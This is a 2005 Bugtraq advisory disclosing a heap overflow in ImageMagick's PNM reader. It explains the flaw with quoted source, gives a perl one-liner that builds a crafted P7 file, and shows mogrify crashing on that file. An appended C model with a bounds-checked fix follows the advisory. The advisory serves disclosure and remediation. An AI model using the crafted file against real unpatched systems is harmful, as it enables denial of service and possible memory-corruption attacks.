Bugtraq: [Overflow.pl] ImageMagick ReadPNMImage() Heap Overflow


From: Damian Put <pucik_at_overflow.pl>
Date: Mon, 25 Apr 2005 07:29:40 +0200

Overflow Security Advisory #3

ImageMagick ReadPNMImage() Heap Overflow

Vendor: ImageMagick (http://www.imagemagick.org)
Affected version: 6.x up to and including 6.2.1
Vendor status: Fixed version released (6.2.2)

Author: Damian Put <pucik_at_overflow.pl>
URL: http://www.overflow.pl/adv/imheapoverflow.txt
Date: 25.04.2005

1. Background

ImageMagick is a free software suite to create, edit, and compose bitmap images. It can read, convert and write images in a large variety of formats.

http://www.imagemagick.org

2. Description

Remote exploitation of a heap overflow vulnerability could allow execution of
arbitrary code or cause a denial of service.

A heap overflow exists in the ReadPNMImage() function, which decodes PNM image
files. The vulnerable code is:

coders/pnm.c:

static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
...
    if ((format == '1') || (format == '4'))
      max_value=1; /* bitmap */
    else
      max_value=PNMInteger(image,10);
    image->depth=max_value < 256 ? 8UL : QuantumDepth;
    if ((format != '3') && (format != '6'))
      {
        image->storage_class=PseudoClass;
        image->colors=(unsigned long) (max_value >= MaxColormapSize ?
          MaxColormapSize : max_value+1);
      }
...
        if (AllocateImageColormap(image,image->colors) == MagickFalse)
          ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
        if (format == '7')
          {
            /*
              Initialize 332 colormap.
            */
            i=0;
            for (pixel.red=0; pixel.red < 8; pixel.red++)
              for (pixel.green=0; pixel.green < 8; pixel.green++)
                for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
                {
                  image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
                  image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
                  image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
                  i++;
                }
          }
...

The value of image->colors is under the attacker's influence: for every format
other than '1' and '4' it is derived from max_value, which PNMInteger() reads
straight from the file header, and it is only ever clamped from above (to
MaxColormapSize), never from below. AllocateImageColormap() then allocates
image->colors entries of sizeof(PixelPacket) bytes each, so a header with a
max_value of 1 yields a colormap of only two entries. When the format is "7",
the code goes on to initialize a 332 colormap, and the three nested loops write
8*8*4 = 256 entries regardless of how many were allocated. Whenever
image->colors*sizeof(PixelPacket) bytes are smaller than that, the stores run
past the end of the buffer and corrupt the adjacent heap structures. The values
written are the fixed ScaleXToQuantum() results rather than data taken from the
file, so turning this into execution of arbitrary code is very difficult or
impossible, but crashing the process is easy.

3. PoC

Example crafted PNM file:

bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm

We can test the vulnerability with "mogrify", a standard ImageMagick utility:

bash$ mogrify vuln.pnm
*** glibc detected *** malloc(): memory corruption: 0x08701198 ***
Aborted (core dumped)
bash$
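The arithmetic from section 2, modeled as an added example (this is not ImageMagick's code and not part of the advisory): it parses the PoC header above the same way the excerpt does, derives image->colors from the attacker-supplied max_value, measures how far the 332 initializer would run past a colormap of that size, and adds the bounds check the original loop lacks. The Quantum width, the PixelPacket layout, the MaxColormapSize value, the P7 header layout (magic, a "332" marker field, columns, rows, max_value, matching the four integers in the PoC file) and the form of the fix are assumptions of this example, not facts taken from the advisory or from the 6.2.2 release.

```c
/* Added example, not ImageMagick code: models the ReadPNMImage() arithmetic the
 * advisory describes, so the gap between the colormap that is allocated and the
 * 256 entries the 332 initializer writes can be measured without corrupting a
 * real heap. Assumptions: 16-bit Quantum, three-channel PixelPacket,
 * MaxColormapSize 65536, P7 header = "P7 <332 marker> <columns> <rows> <max_value>". */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

typedef unsigned short Quantum;                     /* assumed QuantumDepth 16 */
typedef struct { Quantum red, green, blue; } PixelPacket;
#define MaxColormapSize 65536UL                     /* assumed */
#define ScaleXToQuantum(x, scale) ((Quantum) (((x) * 65535UL) / (scale)))
#define COLORMAP_332_ENTRIES (8UL * 8UL * 4UL)      /* what the nested loops write: 256 */

struct pnm_header { char format; unsigned long columns, rows, max_value, colors; };

/* Skip whitespace and read one decimal integer; returns 0 on malformed input. */
static int pnm_integer(const unsigned char *buf, size_t len, size_t *pos, unsigned long *out)
{
    while (*pos < len && isspace(buf[*pos])) (*pos)++;
    if (*pos >= len || !isdigit(buf[*pos])) return 0;
    for (*out = 0; *pos < len && isdigit(buf[*pos]); (*pos)++)
        *out = *out * 10 + (buf[*pos] - '0');
    return 1;
}

/* Mirrors the excerpt: max_value comes straight from the file, and image->colors
 * is clamped only from above, so a tiny max_value yields a tiny colormap. */
int parse_pnm_header(const unsigned char *buf, size_t len, struct pnm_header *h)
{
    size_t pos = 2;
    unsigned long marker;
    if (len < 2 || buf[0] != 'P' || buf[1] < '1' || buf[1] > '7') return 0;
    h->format = (char) buf[1];
    if (h->format == '7' && !pnm_integer(buf, len, &pos, &marker)) return 0; /* "332" */
    if (!pnm_integer(buf, len, &pos, &h->columns) || !pnm_integer(buf, len, &pos, &h->rows))
        return 0;
    if (h->format == '1' || h->format == '4') h->max_value = 1;              /* bitmap */
    else if (!pnm_integer(buf, len, &pos, &h->max_value)) return 0;
    h->colors = (h->format == '3' || h->format == '6') ? 0 :                 /* DirectClass */
        (h->max_value >= MaxColormapSize ? MaxColormapSize : h->max_value + 1);
    return 1;
}

/* Bytes the 332 initializer writes past a colormap of `colors` entries (0 = fits). */
unsigned long colormap_overflow_bytes(char format, unsigned long colors)
{
    if (format != '7' || colors >= COLORMAP_332_ENTRIES) return 0;
    return (COLORMAP_332_ENTRIES - colors) * sizeof(PixelPacket);
}

/* The advisory's loop as written: 256 stores regardless of the allocation.
 * Reached only through the checked wrapper below. */
static void init_332_colormap_unchecked(PixelPacket *colormap)
{
    unsigned long i = 0, r, g, b;
    for (r = 0; r < 8; r++)
        for (g = 0; g < 8; g++)
            for (b = 0; b < 4; b++, i++) {
                colormap[i].red = ScaleXToQuantum(r, 0x07);
                colormap[i].green = ScaleXToQuantum(g, 0x07);
                colormap[i].blue = ScaleXToQuantum(b, 0x03);
            }
}

/* One possible fix (not necessarily what 6.2.2 shipped): refuse a colormap that
 * cannot hold all 256 entries instead of writing past its end. */
int init_332_colormap_checked(PixelPacket *colormap, unsigned long colors)
{
    if (colors < COLORMAP_332_ENTRIES) return -1;
    init_332_colormap_unchecked(colormap);
    return 0;
}

int main(void)
{
    /* Constructed input: the advisory's PoC header. */
    static const unsigned char poc[] = "P7\n1\n1 1\n1";
    struct pnm_header h;
    PixelPacket *map;

    if (!parse_pnm_header(poc, sizeof poc - 1, &h)) return 1;
    map = calloc(h.colors, sizeof *map);            /* exactly what AllocateImageColormap() gives */
    printf("P%c max_value=%lu colors=%lu: 332 init would overrun by %lu bytes, checked init -> %d\n",
           h.format, h.max_value, h.colors, colormap_overflow_bytes(h.format, h.colors),
           map ? init_332_colormap_checked(map, h.colors) : -1);
    free(map);
    return 0;
}
```

Compile with cc -o pnm_model pnm_model.c and run it: for the PoC header it reports colors=2, an overrun of 254*sizeof(PixelPacket) bytes, and the checked initializer returns -1 instead of writing. The check matters because max_value is only ever clamped from above, so any P7 file with a max_value below 255 reaches the 256-entry loop with a buffer that is too small; forcing image->colors up to 256 for format '7' would be the other obvious repair.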
Received on Apr 25 2005
